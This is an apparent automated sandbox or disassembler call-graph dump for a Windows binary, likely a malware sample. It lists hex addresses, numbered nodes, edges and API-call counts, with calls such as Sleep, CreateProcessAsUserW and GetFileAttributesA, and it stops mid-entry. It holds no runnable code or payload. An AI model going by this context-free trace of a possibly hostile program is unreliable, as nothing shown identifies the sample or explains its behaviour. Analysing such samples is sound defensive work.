36400 2dd4b30 36399->36400 36401 2db4860 11 API calls 36400->36401 36402 2dd4b51 36401->36402 36403 2dd4b5c 36402->36403 36404 2db47ec 11 API calls 36403->36404 36405 2dd4b88 36404->36405 36406 2dd4b93 36405->36406 36407 2dc89d0 20 API calls 36406->36407 36408 2dd4bac 36407->36408 36409 2dc88b8 20 API calls 36408->36409 36410 2dd4bb1 36409->36410 36411 2dce358 11 API calls 36410->36411 36412 2dd4bc6 36411->36412 36413 2dd4be8 36412->36413 36414 2dd4c00 36413->36414 36415 2dcdc8c 17 API calls 36414->36415 36416 2dd4c0c 36415->36416 36417 2db4860 11 API calls 36416->36417 36418 2dd4c2d 36417->36418 36419 2dd4c38 36418->36419 36420 2dd4c45 36419->36420 36421 2db47ec 11 API calls 36420->36421 36422 2dd4c64 36421->36422 36423 2dd4c6f 36422->36423 36424 2dd4c7c 36423->36424 36425 2dc89d0 20 API calls 36424->36425 36426 2dd4c88 36425->36426 36427 2db4860 11 API calls 36426->36427 36428 2dd4ca9 36427->36428 36429 2dd4cb4 36428->36429 36430 2dd4cc1 36429->36430 36431 2db47ec 11 API calls 36430->36431 36432 2dd4ce0 36431->36432 36433 2dd4ceb 36432->36433 36434 2dd4cf8 36433->36434 36435 2dc89d0 20 API calls 36434->36435 36436 2dd4d04 36435->36436 36437 2db4860 11 API calls 36436->36437 36438 2dd4d25 36437->36438 36439 2dd4d30 36438->36439 36440 2dd4d3d 36439->36440 36441 2db47ec 11 API calls 36440->36441 36442 2dd4d5c 36441->36442 36443 2dd4d67 36442->36443 36444 2dd4d74 36443->36444 36445 2dc89d0 20 API calls 36444->36445 36446 2dd4d80 36445->36446 36447 2db4860 11 API calls 36446->36447 36448 2dd4da1 36447->36448 36449 2dd4dac 36448->36449 36450 2dd4db9 36449->36450 36451 2db47ec 11 API calls 36450->36451 36452 2dd4dd8 36451->36452 36453 2dd4df0 36452->36453 36454 2dc89d0 20 API calls 36453->36454 36455 2dd4dfc 36454->36455 36456 2db4860 11 API calls 36455->36456 36457 2dd4e1d 36456->36457 36458 2dd4e28 36457->36458 36459 2dd4e35 36458->36459 36460 2db47ec 11 API calls 36459->36460 36461 2dd4e54 36460->36461 36462 2dd4e5f 36461->36462 36463 2dd4e6c 36462->36463 36464 2dc89d0 20 API calls 36463->36464 36465 2dd4e78 36464->36465 36466 2db4860 11 API calls 36465->36466 36467 2dd4e99 36466->36467 36468 2dd4ea4 36467->36468 36469 2dd4eb1 36468->36469 36470 2db47ec 11 API calls 36469->36470 36471 2dd4ed0 36470->36471 36472 2dd4edb 36471->36472 36473 2dd4ee8 36472->36473 36474 2dc89d0 20 API calls 36473->36474 36475 2dd4ef4 36474->36475 36476 2db4860 11 API calls 36475->36476 36477 2dd4f15 36476->36477 36478 2dd4f20 36477->36478 36479 2dd4f2d 36478->36479 36480 2db47ec 11 API calls 36479->36480 36481 2dd4f4c 36480->36481 36482 2dc89d0 20 API calls 36481->36482 36483 2dd4f70 36482->36483 36484 2db4860 11 API calls 36483->36484 36485 2dd4f91 36484->36485 36486 2dd4fa9 36485->36486 36487 2db47ec 11 API calls 36486->36487 36488 2dd4fc8 36487->36488 36489 2dd4fe0 36488->36489 36490 2dc89d0 20 API calls 36489->36490 36491 2dd4fec 36490->36491 36492 2dc88b8 20 API calls 36491->36492 36493 2dd4ff1 36492->36493 36494 2db4860 11 API calls 36493->36494 36495 2dd5012 36494->36495 36496 2db47ec 11 API calls 36495->36496 36497 2dd5049 36496->36497 36498 2dc89d0 20 API calls 36497->36498 36499 2dd506d 36498->36499 36500 2db4860 11 API calls 36499->36500 36501 2dd508e 36500->36501 36502 2dd50a6 36501->36502 36503 2db47ec 11 API calls 36502->36503 36504 2dd50c5 36503->36504 36505 2dd50dd 36504->36505 36506 2dc89d0 20 API calls 36505->36506 36507 2dd50e9 Sleep 36506->36507 36508 2db4860 11 API calls 36507->36508 36509 2dd5114 36508->36509 36510 2dd511f 36509->36510 36511 2dd512c 36510->36511 36512 2db47ec 11 API calls 36511->36512 36513 2dd514b 36512->36513 36514 2dd5163 36513->36514 36515 2dc89d0 20 API calls 36514->36515 36516 2dd516f 36515->36516 36517 2db4860 11 API calls 36516->36517 36518 2dd5190 36517->36518 36519 2dd519b 36518->36519 36520 2dd51a8 36519->36520 36521 2db47ec 11 API calls 36520->36521 36522 2dd51c7 36521->36522 36523 2dd51df 36522->36523 36524 2dc89d0 20 API calls 36523->36524 36525 2dd51eb 36524->36525 36526 2db4860 11 API calls 36525->36526 36527 2dd520c 36526->36527 36528 2dd5217 36527->36528 36529 2dd5224 36528->36529 36530 2db47ec 11 API calls 36529->36530 36531 2dd5243 36530->36531 36532 2dd525b 36531->36532 36533 2dc89d0 20 API calls 36532->36533 36534 2dd5267 36533->36534 36535 2dd527e 36534->36535 37869 2dcdc04 36535->37869 36537 2dd5289 36538 2dd52a0 36537->36538 36539 2dcdc04 5 API calls 36538->36539 36540 2dd52ab 36539->36540 36541 2dd52c2 36540->36541 36542 2dcdc04 5 API calls 36541->36542 36543 2dd52cd 36542->36543 36544 2dd52e4 36543->36544 36545 2dcdc04 5 API calls 36544->36545 36546 2dd52ef 36545->36546 36547 2db4860 11 API calls 36546->36547 36548 2dd5310 36547->36548 36549 2dd531b 36548->36549 36550 2db47ec 11 API calls 36549->36550 36551 2dd5347 36550->36551 36552 2dd5352 36551->36552 36553 2dc89d0 20 API calls 36552->36553 36554 2dd536b 36553->36554 36555 2db4860 11 API calls 36554->36555 36556 2dd538c 36555->36556 36557 2db47ec 11 API calls 36556->36557 36558 2dd53c3 36557->36558 36559 2dc89d0 20 API calls 36558->36559 36560 2dd53e7 36559->36560 36561 2db4860 11 API calls 36560->36561 36562 2dd5408 36561->36562 36563 2dd5420 36562->36563 36564 2db47ec 11 API calls 36563->36564 36565 2dd543f 36564->36565 36566 2dd5457 36565->36566 36567 2dc89d0 20 API calls 36566->36567 36568 2dd5463 36567->36568 36569 2db4860 11 API calls 36568->36569 36570 2dd5484 36569->36570 36571 2dd548f 36570->36571 36572 2db47ec 11 API calls 36571->36572 36573 2dd54bb 36572->36573 36574 2dd54c6 36573->36574 36575 2dc89d0 20 API calls 36574->36575 36576 2dd54df 36575->36576 36577 2dd54ef 36576->36577 36578 2dcdc04 5 API calls 36577->36578 36579 2dd54fa 36578->36579 36580 2dcdc04 5 API calls 36579->36580 36581 2dd5515 36580->36581 36582 2dd5530 36581->36582 36583 2dcdc04 5 API calls 36581->36583 36584 2db4860 11 API calls 36582->36584 36583->36582 36585 2dd5551 36584->36585 36586 2dd555c 36585->36586 36587 2db47ec 11 API calls 36586->36587 36588 2dd5588 36587->36588 36589 2dd5593 36588->36589 36590 2dc89d0 20 API calls 36589->36590 36591 2dd55ac 36590->36591 36592 2db4860 11 API calls 36591->36592 36593 2dd55cd 36592->36593 36594 2db47ec 11 API calls 36593->36594 36595 2dd5604 36594->36595 36596 2dc89d0 20 API calls 36595->36596 36597 2dd5628 36596->36597 36598 2db4860 11 API calls 36597->36598 36599 2dd5649 36598->36599 36600 2dd5654 36599->36600 36601 2dd5661 36600->36601 36602 2db47ec 11 API calls 36601->36602 36603 2dd5680 36602->36603 36604 2dd5698 36603->36604 36605 2dc89d0 20 API calls 36604->36605 36606 2dd56a4 36605->36606 36607 2db4860 11 API calls 36606->36607 36608 2dd56c5 36607->36608 36609 2dd56d0 36608->36609 36610 2dd56dd 36609->36610 36611 2db47ec 11 API calls 36610->36611 36612 2dd56fc 36611->36612 36613 2dd5714 36612->36613 36614 2dc89d0 20 API calls 36613->36614 36615 2dd5720 36614->36615 37880 2dce398 36615->37880 36618 2db4530 11 API calls 36619 2dd5746 36618->36619 36620 2db4860 11 API calls 36619->36620 36621 2dd5767 36620->36621 36622 2db47ec 11 API calls 36621->36622 36623 2dd579e 36622->36623 36624 2dc89d0 20 API calls 36623->36624 36625 2dd57c2 36624->36625 36626 2db4860 11 API calls 36625->36626 36627 2dd57e3 36626->36627 36628 2db47ec 11 API calls 36627->36628 36629 2dd581a 36628->36629 36630 2dc89d0 20 API calls 36629->36630 36631 2dd583e 36630->36631 37893 2db7acc 36631->37893 36636 2db4530 11 API calls 36637 2dd586a 36636->36637 36638 2db4860 11 API calls 36637->36638 36639 2dd588b 36638->36639 36640 2db47ec 11 API calls 36639->36640 36641 2dd58c2 36640->36641 36642 2dc89d0 20 API calls 36641->36642 36643 2dd58e6 36642->36643 36644 2db4860 11 API calls 36643->36644 36645 2dd5907 36644->36645 36646 2db47ec 11 API calls 36645->36646 36647 2dd593e 36646->36647 36648 2dc89d0 20 API calls 36647->36648 36649 2dd5962 36648->36649 36650 2db4860 11 API calls 36649->36650 36651 2dd5983 36650->36651 36652 2db47ec 11 API calls 36651->36652 36653 2dd59ba 36652->36653 36654 2dc89d0 20 API calls 36653->36654 36655 2dd59de 36654->36655 36656 2db4860 11 API calls 36655->36656 36657 2dd59ff 36656->36657 36658 2db47ec 11 API calls 36657->36658 36659 2dd5a36 36658->36659 36660 2dc89d0 20 API calls 36659->36660 36661 2dd5a5a 36660->36661 36662 2dcf094 11 API calls 36661->36662 36663 2dd5a6a 36662->36663 37906 2dcf108 36663->37906 36666 2db4530 11 API calls 36667 2dd5a8b 36666->36667 36668 2db4860 11 API calls 36667->36668 36669 2dd5aac 36668->36669 36670 2db47ec 11 API calls 36669->36670 36671 2dd5ae3 36670->36671 36672 2dc89d0 20 API calls 36671->36672 36673 2dd5b07 36672->36673 36674 2db4860 11 API calls 36673->36674 36675 2dd5b28 36674->36675 36676 2db47ec 11 API calls 36675->36676 36677 2dd5b5f 36676->36677 36678 2dc89d0 20 API calls 36677->36678 36679 2dd5b83 36678->36679 36680 2db4860 11 API calls 36679->36680 36681 2dd5ba4 36680->36681 36682 2db47ec 11 API calls 36681->36682 36683 2dd5bdb 36682->36683 36684 2dc89d0 20 API calls 36683->36684 36685 2dd5bff 36684->36685 36686 2db4860 11 API calls 36685->36686 36687 2dd5c20 36686->36687 36688 2db47ec 11 API calls 36687->36688 36689 2dd5c57 36688->36689 36690 2dc89d0 20 API calls 36689->36690 36691 2dd5c7b 36690->36691 36692 2db4860 11 API calls 36691->36692 36693 2dd5c9c 36692->36693 36694 2db47ec 11 API calls 36693->36694 36695 2dd5cd3 36694->36695 36696 2dc89d0 20 API calls 36695->36696 36697 2dd5cf7 36696->36697 36698 2db4860 11 API calls 36697->36698 36699 2dd5d18 36698->36699 36700 2db47ec 11 API calls 36699->36700 36701 2dd5d4f 36700->36701 36702 2dc89d0 20 API calls 36701->36702 36704 2dd5d73 36702->36704 36703 2dd7568 36705 2db4860 11 API calls 36703->36705 36704->36703 36706 2db4860 11 API calls 36704->36706 36707 2dd7589 36705->36707 36708 2dd5da8 36706->36708 36710 2db47ec 11 API calls 36707->36710 37911 2db7e5c 36708->37911 36714 2dd75c0 36710->36714 36712 2dd5dd3 36713 2db4860 11 API calls 36712->36713 36717 2dd5df4 36713->36717 36715 2dc89d0 20 API calls 36714->36715 36716 2dd75e4 36715->36716 36718 2db4860 11 API calls 36716->36718 36719 2db47ec 11 API calls 36717->36719 36720 2dd7605 36718->36720 36721 2dd5e2b 36719->36721 36722 2db47ec 11 API calls 36720->36722 36723 2dc89d0 20 API calls 36721->36723 36726 2dd763c 36722->36726 36724 2dd5e4f 36723->36724 36725 2db4860 11 API calls 36724->36725 36729 2dd5e70 36725->36729 36727 2dc89d0 20 API calls 36726->36727 36728 2dd7660 36727->36728 36730 2db4860 11 API calls 36728->36730 36731 2db47ec 11 API calls 36729->36731 36732 2dd7681 36730->36732 36733 2dd5ea7 36731->36733 36734 2db47ec 11 API calls 36732->36734 36735 2dc89d0 20 API calls 36733->36735 36738 2dd76b8 36734->36738 36736 2dd5ecb 36735->36736 36737 2db4860 11 API calls 36736->36737 36740 2dd5eec 36737->36740 36739 2dc89d0 20 API calls 36738->36739 36741 2dd76dc 36739->36741 36743 2db47ec 11 API calls 36740->36743 36742 2db4860 11 API calls 36741->36742 36744 2dd76fd 36742->36744 36745 2dd5f23 36743->36745 36746 2db47ec 11 API calls 36744->36746 36747 2dc89d0 20 API calls 36745->36747 36750 2dd7734 36746->36750 36748 2dd5f47 36747->36748 36749 2db4860 11 API calls 36748->36749 36752 2dd5f68 36749->36752 36751 2dc89d0 20 API calls 36750->36751 36753 2dd7758 36751->36753 36755 2db4860 11 API calls 36752->36755 36754 2db4860 11 API calls 36753->36754 36756 2dd7779 36754->36756 36757 2dd5fa0 36755->36757 36758 2db47ec 11 API calls 36756->36758 36759 2db47ec 11 API calls 36757->36759 36760 2dd77b0 36758->36760 36761 2dd5fd7 36759->36761 36762 2dc89d0 20 API calls 36760->36762 36763 2dc89d0 20 API calls 36761->36763 36764 2dd77d4 36762->36764 36765 2dd5ffb 36763->36765 36767 2dd77e9 36764->36767 36768 2dd8318 36764->36768 36766 2db4860 11 API calls 36765->36766 36771 2dd601c 36766->36771 36770 2db4860 11 API calls 36767->36770 36769 2db4860 11 API calls 36768->36769 36774 2dd8339 36769->36774 36772 2dd780a 36770->36772 36773 2db47ec 11 API calls 36771->36773 36776 2db47ec 11 API calls 36772->36776 36777 2dd6053 36773->36777 36775 2db47ec 11 API calls 36774->36775 36778 2dd8370 36775->36778 36779 2dd7841 36776->36779 36780 2dc89d0 20 API calls 36777->36780 36783 2dc89d0 20 API calls 36778->36783 36784 2dc89d0 20 API calls 36779->36784 36781 2dd6077 36780->36781 36782 2db4860 11 API calls 36781->36782 36789 2dd6098 36782->36789 36785 2dd8394 36783->36785 36786 2dd7865 36784->36786 36787 2db4860 11 API calls 36785->36787 36788 2db4860 11 API calls 36786->36788 36792 2dd83b5 36787->36792 36790 2dd7886 36788->36790 36791 2db47ec 11 API calls 36789->36791 36793 2db47ec 11 API calls 36790->36793 36795 2dd60cf 36791->36795 36794 2db47ec 11 API calls 36792->36794 36797 2dd78bd 36793->36797 36796 2dd83ec 36794->36796 36798 2dc89d0 20 API calls 36795->36798 36800 2dc89d0 20 API calls 36796->36800 36801 2dc89d0 20 API calls 36797->36801 36799 2dd60f3 36798->36799 36802 2db4860 11 API calls 36799->36802 36803 2dd8410 36800->36803 36804 2dd78e1 36801->36804 36807 2dd6114 36802->36807 36805 2db4860 11 API calls 36803->36805 36806 2db4860 11 API calls 36804->36806 36809 2dd8431 36805->36809 36810 2dd7902 36806->36810 36808 2db47ec 11 API calls 36807->36808 36813 2dd614b 36808->36813 36812 2db47ec 11 API calls 36809->36812 36811 2db47ec 11 API calls 36810->36811 36815 2dd7939 36811->36815 36814 2dd8468 36812->36814 36816 2dc89d0 20 API calls 36813->36816 36818 2dc89d0 20 API calls 36814->36818 36819 2dc89d0 20 API calls 36815->36819 36817 2dd616f 36816->36817 36820 2db4860 11 API calls 36817->36820 36821 2dd848c 36818->36821 36822 2dd795d 36819->36822 36826 2dd61a9 36820->36826 36823 2db4860 11 API calls 36821->36823 36824 2db47ec 11 API calls 36822->36824 36828 2dd84ad 36823->36828 36825 2dd7975 36824->36825 36829 2dc85bc 18 API calls 36825->36829 36827 2db4860 11 API calls 36826->36827 36833 2dd61e1 36827->36833 36831 2db47ec 11 API calls 36828->36831 36830 2dd7986 36829->36830 36832 2db4860 11 API calls 36830->36832 36836 2dd84e4 36831->36836 36834 2dd79a7 36832->36834 36835 2db47ec 11 API calls 36833->36835 36838 2db47ec 11 API calls 36834->36838 36840 2dd6218 36835->36840 36837 2dc89d0 20 API calls 36836->36837 36839 2dd8508 36837->36839 36843 2dd79de 36838->36843 36841 2dd851d 36839->36841 36842 2dd93a1 36839->36842 36844 2dc89d0 20 API calls 36840->36844 36846 2db4860 11 API calls 36841->36846 36845 2db4860 11 API calls 36842->36845 36850 2dc89d0 20 API calls 36843->36850 36847 2dd623c 36844->36847 36853 2dd93c2 36845->36853 36849 2dd853e 36846->36849 36848 2db4860 11 API calls 36847->36848 36855 2dd625d 36848->36855 36854 2dd8556 36849->36854 36851 2dd7a02 36850->36851 36852 2db4860 11 API calls 36851->36852 36858 2dd7a23 36852->36858 36856 2db47ec 11 API calls 36853->36856 36857 2db47ec 11 API calls 36854->36857 36859 2db47ec 11 API calls 36855->36859 36862 2dd93f9 36856->36862 36860 2dd8575 36857->36860 36861 2db47ec 11 API calls 36858->36861 36864 2dd6294 36859->36864 36863 2dd858d 36860->36863 36868 2dd7a5a 36861->36868 36866 2dc89d0 20 API calls 36862->36866 36865 2dc89d0 20 API calls 36863->36865 36869 2dc89d0 20 API calls 36864->36869 36867 2dd8599 36865->36867 36870 2dd941d 36866->36870 36871 2db4860 11 API calls 36867->36871 36875 2dc89d0 20 API calls 36868->36875 36872 2dd62b8 36869->36872 36873 2db4860 11 API calls 36870->36873 36874 2dd85ba 36871->36874 36876 2db4860 11 API calls 36872->36876 36879 2dd943e 36873->36879 36881 2dd85c5 36874->36881 36877 2dd7a7e 36875->36877 36880 2dd62d9 36876->36880 36878 2db4860 11 API calls 36877->36878 36886 2dd7a9f 36878->36886 36882 2db47ec 11 API calls 36879->36882 36884 2db47ec 11 API calls 36880->36884 36883 2db47ec 11 API calls 36881->36883 36888 2dd9475 36882->36888 36885 2dd85f1 36883->36885 36889 2dd6310 36884->36889 36890 2dd85fc 36885->36890 36887 2db47ec 11 API calls 36886->36887 36894 2dd7ad6 36887->36894 36891 2dc89d0 20 API calls 36888->36891 36895 2dc89d0 20 API calls 36889->36895 36892 2dc89d0 20 API calls 36890->36892 36896 2dd9499 36891->36896 36893 2dd8615 36892->36893 36897 2db4860 11 API calls 36893->36897 36900 2dc89d0 20 API calls 36894->36900 36898 2dd6334 36895->36898 36899 2db4860 11 API calls 36896->36899 36903 2dd8636 36897->36903 36901 2db4860 11 API calls 36898->36901 36902 2dd94ba 36899->36902 36905 2dd7afa 36900->36905 36904 2dd6355 36901->36904 36906 2db47ec 11 API calls 36902->36906 36907 2db47ec 11 API calls 36903->36907 36908 2db47ec 11 API calls 36904->36908 38335 2dcadf8 29 API calls 36905->38335 36912 2dd94f1 36906->36912 36913 2dd866d 36907->36913 36914 2dd638c 36908->36914 36910 2dd7b21 36911 2db4860 11 API calls 36910->36911 36917 2dd7b42 36911->36917 36915 2dc89d0 20 API calls 36912->36915 36916 2dc89d0 20 API calls 36913->36916 36918 2dc89d0 20 API calls 36914->36918 36928 2dd9515 36915->36928 36919 2dd8691 36916->36919 36923 2db47ec 11 API calls 36917->36923 36920 2dd63b0 36918->36920 36921 2db47ec 11 API calls 36919->36921 36924 2db4860 11 API calls 36920->36924 36922 2dd86bd 36921->36922 36927 2dd86d5 36922->36927 36929 2dd7b79 36923->36929 36930 2dd63d1 36924->36930 36925 2dd9cf5 36926 2db4860 11 API calls 36925->36926 36933 2dd9d16 36926->36933 36934 2dd86e0 CreateProcessAsUserW 36927->36934 36928->36925 36931 2db4860 11 API calls 36928->36931 36935 2dc89d0 20 API calls 36929->36935 36932 2db47ec 11 API calls 36930->36932 36943 2dd9560 36931->36943 36945 2dd6408 36932->36945 36939 2db47ec 11 API calls 36933->36939 36936 2dd876e 36934->36936 36937 2dd86f2 36934->36937 36938 2dd7b9d 36935->36938 36940 2db4860 11 API calls 36936->36940 36941 2db4860 11 API calls 36937->36941 36942 2db4860 11 API calls 36938->36942 36950 2dd9d4d 36939->36950 36951 2dd878f 36940->36951 36944 2dd8713 36941->36944 36948 2dd7bbe 36942->36948 36946 2db47ec 11 API calls 36943->36946 36947 2dd871e 36944->36947 36949 2dc89d0 20 API calls 36945->36949 36958 2dd9597 36946->36958 36957 2db47ec 11 API calls 36947->36957 36953 2db47ec 11 API calls 36948->36953 36952 2dd642c 36949->36952 36955 2dc89d0 20 API calls 36950->36955 36956 2db47ec 11 API calls 36951->36956 36954 2db4860 11 API calls 36952->36954 36965 2dd7bf5 36953->36965 36966 2dd644d 36954->36966 36959 2dd9d71 36955->36959 36964 2dd87c6 36956->36964 36960 2dd874a 36957->36960 36963 2dc89d0 20 API calls 36958->36963 36961 2db4860 11 API calls 36959->36961 36962 2dd8755 36960->36962 36969 2dd9d92 36961->36969 36971 2dc89d0 20 API calls 36962->36971 36967 2dd95bb 36963->36967 36970 2dc89d0 20 API calls 36964->36970 36972 2dc89d0 20 API calls 36965->36972 36973 2db47ec 11 API calls 36966->36973 36968 2db4860 11 API calls 36967->36968 36979 2dd95dc 36968->36979 36976 2db47ec 11 API calls 36969->36976 36974 2dd87ea 36970->36974 36971->36936 36975 2dd7c19 36972->36975 36980 2dd6484 36973->36980 36977 2db4860 11 API calls 36974->36977 36978 2db4860 11 API calls 36975->36978 36983 2dd9dc9 36976->36983 36984 2dd880b 36977->36984 36985 2dd7c3a 36978->36985 36981 2db47ec 11 API calls 36979->36981 36982 2dc89d0 20 API calls 36980->36982 36992 2dd9613 36981->36992 36986 2dd64a8 36982->36986 36989 2dc89d0 20 API calls 36983->36989 36990 2db47ec 11 API calls 36984->36990 36987 2db47ec 11 API calls 36985->36987 36988 2db4860 11 API calls 36986->36988 36996 2dd7c71 36987->36996 36991 2dd64d5 36988->36991 36993 2dd9ded 36989->36993 36999 2dd8842 36990->36999 37915 2dc85bc 36991->37915 36995 2dc89d0 20 API calls 36992->36995 36994 2db4860 11 API calls 36993->36994 37002 2dd9e0e 36994->37002 36998 2dd9637 36995->36998 37004 2dc89d0 20 API calls 36996->37004 37001 2db4860 11 API calls 36998->37001 37003 2dc89d0 20 API calls 36999->37003 37009 2dd9658 37001->37009 37008 2db47ec 11 API calls 37002->37008 37006 2dd8866 37003->37006 37007 2dd7c95 37004->37007 37005 2db4860 11 API calls 37011 2dd6507 37005->37011 37010 2db49f8 11 API calls 37006->37010 37013 2db4860 11 API calls 37007->37013 37016 2dd9e45 37008->37016 37014 2db47ec 11 API calls 37009->37014 37012 2dd888a 37010->37012 37015 2db47ec 11 API calls 37011->37015 37017 2db4860 11 API calls 37012->37017 37020 2dd7cd5 37013->37020 37021 2dd968f 37014->37021 37023 2dd653e 37015->37023 37018 2dc89d0 20 API calls 37016->37018 37019 2dd88b9 37017->37019 37027 2dd9e69 37018->37027 37028 2dd88c4 37019->37028 37022 2db47ec 11 API calls 37020->37022 37024 2dc89d0 20 API calls 37021->37024 37032 2dd7d0c 37022->37032 37025 2dc89d0 20 API calls 37023->37025 37026 2dd96b3 37024->37026 37029 2dd6562 37025->37029 37030 2dcf094 11 API calls 37026->37030 37035 2dc89d0 20 API calls 37027->37035 37031 2db47ec 11 API calls 37028->37031 37033 2db4860 11 API calls 37029->37033 37034 2dd96ce 37030->37034 37036 2dd88f0 37031->37036 37038 2dc89d0 20 API calls 37032->37038 37043 2dd6583 37033->37043 37037 2db4860 11 API calls 37034->37037 37040 2dd9e9c 37035->37040 37041 2dd88fb 37036->37041 37044 2dd96f7 37037->37044 37039 2dd7d30 37038->37039 37042 2db4860 11 API calls 37039->37042 37047 2dc89d0 20 API calls 37040->37047 37045 2dc89d0 20 API calls 37041->37045 37051 2dd7d51 37042->37051 37046 2db47ec 11 API calls 37043->37046 37049 2db4860 11 API calls 37044->37049 37048 2dd8914 37045->37048 37052 2dd65ba 37046->37052 37053 2dd9ecf 37047->37053 37050 2db4860 11 API calls 37048->37050 37055 2dd972f 37049->37055 37056 2dd8935 37050->37056 37054 2db47ec 11 API calls 37051->37054 37057 2dc89d0 20 API calls 37052->37057 37058 2dc89d0 20 API calls 37053->37058 37062 2dd7d88 37054->37062 37060 2db47ec 11 API calls 37055->37060 37061 2db47ec 11 API calls 37056->37061 37059 2dd65de 37057->37059 37065 2dd9f02 37058->37065 37063 2db4860 11 API calls 37059->37063 37068 2dd9766 37060->37068 37066 2dd896c 37061->37066 37064 2dc89d0 20 API calls 37062->37064 37071 2dd65ff 37063->37071 37067 2dd7dac 37064->37067 37069 2dc89d0 20 API calls 37065->37069 37073 2dc89d0 20 API calls 37066->37073 37070 2db4860 11 API calls 37067->37070 37074 2dc89d0 20 API calls 37068->37074 37072 2dd9f35 37069->37072 37081 2dd7dcd 37070->37081 37078 2db47ec 11 API calls 37071->37078 37076 2db4860 11 API calls 37072->37076 37077 2dd8990 37073->37077 37075 2dd978a 37074->37075 37079 2db4860 11 API calls 37075->37079 37083 2dd9f56 37076->37083 37080 2db4860 11 API calls 37077->37080 37082 2dd6636 37078->37082 37085 2dd97ab 37079->37085 37086 2dd89b1 37080->37086 37084 2db47ec 11 API calls 37081->37084 37087 2dc89d0 20 API calls 37082->37087 37088 2db47ec 11 API calls 37083->37088 37092 2dd7e04 37084->37092 37090 2db47ec 11 API calls 37085->37090 37091 2db47ec 11 API calls 37086->37091 37089 2dd665a 37087->37089 37095 2dd9f8d 37088->37095 37093 2db4860 11 API calls 37089->37093 37097 2dd97e2 37090->37097 37098 2dd89e8 37091->37098 37094 2dc89d0 20 API calls 37092->37094 37100 2dd667b 37093->37100 37096 2dd7e28 37094->37096 37101 2dc89d0 20 API calls 37095->37101 38336 2dc5aec 42 API calls 37096->38336 37104 2dc89d0 20 API calls 37097->37104 37102 2dc89d0 20 API calls 37098->37102 37109 2db47ec 11 API calls 37100->37109 37105 2dd9fb1 37101->37105 37107 2dd8a0c 37102->37107 37110 2dd9806 37104->37110 37106 2db4860 11 API calls 37105->37106 37121 2dd9fd2 37106->37121 38345 2dcd164 23 API calls 37107->38345 37108 2dd7e54 37117 2db4bcc 11 API calls 37108->37117 37118 2dd66b2 37109->37118 37112 2db7e5c GetFileAttributesA 37110->37112 37113 2dd9810 37112->37113 37115 2dd9aef 37113->37115 37119 2db4860 11 API calls 37113->37119 37114 2dd8a20 37116 2db4860 11 API calls 37114->37116 37120 2db4860 11 API calls 37115->37120 37126 2dd8a46 37116->37126 37122 2dd7e69 37117->37122 37124 2dc89d0 20 API calls 37118->37124 37127 2dd9839 37119->37127 37128 2dd9b10 37120->37128 37125 2db47ec 11 API calls 37121->37125 37123 2db4860 11 API calls 37122->37123 37129 2dd7e8a 37123->37129 37132 2dd66d6 37124->37132 37135 2dda009 37125->37135 37130 2db47ec 11 API calls 37126->37130 37133 2db47ec 11 API calls 37127->37133 37134 2db47ec 11 API calls 37128->37134 37136 2db47ec 11 API calls 37129->37136 37141 2dd8a7d 37130->37141 37131 2dd6949 37138 2db4860 11 API calls 37131->37138 37132->37131 37137 2db4860 11 API calls 37132->37137 37142 2dd9870 37133->37142 37143 2dd9b47 37134->37143 37139 2dc89d0 20 API calls 37135->37139 37146 2dd7ec1 37136->37146 37147 2dd670c 37137->37147 37148 2dd696a 37138->37148 37140 2dda02d 37139->37140 37144 2db4860 11 API calls 37140->37144 37145 2dc89d0 20 API calls 37141->37145 37151 2dc89d0 20 API calls 37142->37151 37149 2dc89d0 20 API calls 37143->37149 37160 2dda04e 37144->37160 37150 2dd8aa1 37145->37150 37155 2dc89d0 20 API calls 37146->37155 37156 2db47ec 11 API calls 37147->37156 37152 2db47ec 11 API calls 37148->37152 37153 2dd9b6b 37149->37153 37154 2db4860 11 API calls 37150->37154 37157 2dd9894 37151->37157 37164 2dd69a1 37152->37164 37159 2db4860 11 API calls 37153->37159 37165 2dd8ac2 37154->37165 37161 2dd7ee5 37155->37161 37163 2dd6743 37156->37163 37158 2db4860 11 API calls 37157->37158 37167 2dd98b5 37158->37167 37168 2dd9b8c 37159->37168 37162 2db47ec 11 API calls 37160->37162 38337 2db49f8 37161->38337 37179 2dda085 37162->37179 37170 2dc89d0 20 API calls 37163->37170 37171 2dc89d0 20 API calls 37164->37171 37172 2db47ec 11 API calls 37165->37172 37176 2db47ec 11 API calls 37167->37176 37178 2db47ec 11 API calls 37168->37178 37175 2dd6767 37170->37175 37177 2dd69c5 37171->37177 37184 2dd8af9 37172->37184 37174 2dd7f08 37180 2db4860 11 API calls 37174->37180 37181 2db4860 11 API calls 37175->37181 37185 2dd98ec 37176->37185 37182 2db4860 11 API calls 37177->37182 37186 2dd9bc3 37178->37186 37183 2dc89d0 20 API calls 37179->37183 37187 2dd7f29 37180->37187 37188 2dd6788 37181->37188 37189 2dd69e6 37182->37189 37193 2dda0a9 37183->37193 37190 2dc89d0 20 API calls 37184->37190 37191 2dc89d0 20 API calls 37185->37191 37192 2dc89d0 20 API calls 37186->37192 37196 2db47ec 11 API calls 37187->37196 37197 2db47ec 11 API calls 37188->37197 37199 2db47ec 11 API calls 37189->37199 37194 2dd8b1d 37190->37194 37198 2dd9910 37191->37198 37200 2dd9be7 37192->37200 37202 2dc89d0 20 API calls 37193->37202 37195 2db4860 11 API calls 37194->37195 37205 2dd8b3e 37195->37205 37206 2dd7f60 37196->37206 37207 2dd67bf 37197->37207 37203 2db4860 11 API calls 37198->37203 37204 2dd6a1d 37199->37204 37201 2db4860 11 API calls 37200->37201 37209 2dd9c08 37201->37209 37210 2dda0dc 37202->37210 37208 2dd9931 37203->37208 37212 2dc89d0 20 API calls 37204->37212 37213 2db47ec 11 API calls 37205->37213 37214 2dc89d0 20 API calls 37206->37214 37211 2dc89d0 20 API calls 37207->37211 37216 2db47ec 11 API calls 37208->37216 37218 2db47ec 11 API calls 37209->37218 37219 2dc89d0 20 API calls 37210->37219 37215 2dd67e3 37211->37215 37217 2dd6a41 37212->37217 37224 2dd8b75 37213->37224 37220 2dd7f84 37214->37220 37221 2db4860 11 API calls 37215->37221 37225 2dd9968 37216->37225 37222 2db4860 11 API calls 37217->37222 37226 2dd9c3f 37218->37226 37227 2dda10f 37219->37227 37223 2db4860 11 API calls 37220->37223 37229 2dd6804 37221->37229 37230 2dd6a62 37222->37230 37228 2dd7fa5 37223->37228 37231 2dc89d0 20 API calls 37224->37231 37232 2dc89d0 20 API calls 37225->37232 37233 2dc89d0 20 API calls 37226->37233 37234 2dc89d0 20 API calls 37227->37234 37236 2db47ec 11 API calls 37228->37236 37237 2db47ec 11 API calls 37229->37237 37239 2db47ec 11 API calls 37230->37239 37235 